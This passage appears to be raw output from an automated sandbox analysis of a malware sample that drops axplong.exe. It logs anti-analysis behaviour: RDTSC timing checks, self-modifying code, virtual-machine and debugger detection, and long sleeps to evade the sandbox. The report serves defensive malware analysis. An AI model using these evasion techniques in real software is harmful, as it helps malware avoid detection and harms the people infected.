Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9488 second address: 2B948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C5401 second address: 2C540F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C540F second address: 2C5415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 201AC7 second address: 201ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C6C23 second address: 2C6C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C6C27 second address: 2C6C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CC766 second address: 2CC76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CC76C second address: 2CC778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F84B0B050D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CC371 second address: 2CC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D8B17 second address: 2D8B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D8B1B second address: 2D8B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65603h 0x0000000c jmp 00007F84B0D655FFh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F84B0D655F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D8B4D second address: 2D8B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jnp 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1059 second address: 2E1065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F84B0D655F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E11C8 second address: 2E11DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F84B0B050D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F84B0B050D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1326 second address: 2E1365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65604h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push edi 0x0000000c jmp 00007F84B0D65604h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0D655FEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E15E0 second address: 2E15EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F84B0B050D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E15EF second address: 2E15F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E15F5 second address: 2E1600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E20C9 second address: 2E20D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F84B0D655F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E20D4 second address: 2E20F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 jg 00007F84B0B050D6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F84B0B050DDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E20F7 second address: 2E20FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E7E60 second address: 2E7E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F84B0B050E4h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7172 second address: 2F7192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F84B0D65603h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7192 second address: 2F71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007F84B0B050DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 307990 second address: 30799A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30781B second address: 307820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 307820 second address: 307837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D655FCh 0x00000008 ja 00007F84B0D655F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30989F second address: 3098AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324B99 second address: 324B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324B9D second address: 324BA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328CCD second address: 328CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328CD2 second address: 328CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328F63 second address: 328F68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A449 second address: 32A44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A44D second address: 32A465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A465 second address: 32A46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A46C second address: 32A492 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0D6560Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F84B0D655F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A492 second address: 32A4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E4h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A4BA second address: 32A4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BCF8 second address: 32BD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BD0E second address: 32BD18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0D655F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32DB68 second address: 32DB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32DB78 second address: 32DB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jl 00007F84B0D655F6h 0x0000000e jg 00007F84B0D655F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D001B second address: 53D0044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050E5h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0044 second address: 53D0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0049 second address: 53D004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0AB1 second address: 53A0AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov al, bh 0x0000000d movzx eax, di 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F84B0B050DBh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54207B2 second address: 54207B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410A32 second address: 5410A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410A49 second address: 5410A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0D655FEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F84B0D65600h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410A8E second address: 5410A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541086C second address: 5410872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410872 second address: 5410878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410878 second address: 541087C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0144 second address: 53B0148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0148 second address: 53B014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B014E second address: 53B01AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0B050E2h 0x00000009 or si, 7CB8h 0x0000000e jmp 00007F84B0B050DBh 0x00000013 popfd 0x00000014 jmp 00007F84B0B050E8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 mov esi, 4BC3F7ADh 0x00000025 mov ebx, eax 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b movzx esi, di 0x0000002e mov ebx, 2BAE4092h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B01AF second address: 53B01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B01B3 second address: 53B01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410C0A second address: 5410C3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 67h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov esi, 72E32E7Fh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410C3A second address: 5410CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov ah, 4Ch 0x0000000f popad 0x00000010 push dword ptr [ebp+08h] 0x00000013 jmp 00007F84B0B050E5h 0x00000018 push 89E7DEA1h 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, 6F500E5Eh 0x00000024 movsx edi, cx 0x00000027 popad 0x00000028 pushfd 0x00000029 jmp 00007F84B0B050E0h 0x0000002e adc ch, 00000028h 0x00000031 jmp 00007F84B0B050DBh 0x00000036 popfd 0x00000037 popad 0x00000038 add dword ptr [esp], 76192161h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F84B0B050E5h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410CBC second address: 5410CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410D24 second address: 5410D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410D29 second address: 5410D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D65602h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DA5D second address: 23DA81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a js 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DC45 second address: 23DC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DC49 second address: 23DC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DC4F second address: 23DC7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F84B0D655FBh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F84B0D65607h 0x00000014 jmp 00007F84B0D65601h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0657 second address: 53C065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7EB2F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7C276 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2BAAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 46EB2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 46EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 46C276 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 6AAAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05410BDB rdtsc 0_2_05410BDB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1176
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 525
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1230
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1189
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 Thread sleep count: 1176 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 Thread sleep time: -2353176s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 Thread sleep count: 525 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 Thread sleep time: -15750000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 Thread sleep count: 1230 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 Thread sleep time: -2461230s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7176 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 Thread sleep count: 1189 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 Thread sleep time: -2379189s >= -30000s
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: axplong.exe, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000006.00000002.2627219543.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05410BDB rdtsc 0_2_05410BDB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0043645B mov eax, dword ptr fs:[00000030h] 6_2_0043645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0043A1C2 mov eax, dword ptr fs:[00000030h] 6_2_0043A1C2
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: -](Program Manager
Source: axplong.exe Binary or memory string: -](Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0041D312 cpuid 6_2_0041D312
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0041CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0041CB1A

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.10000.0.unpack, type: UNPACKEDPE
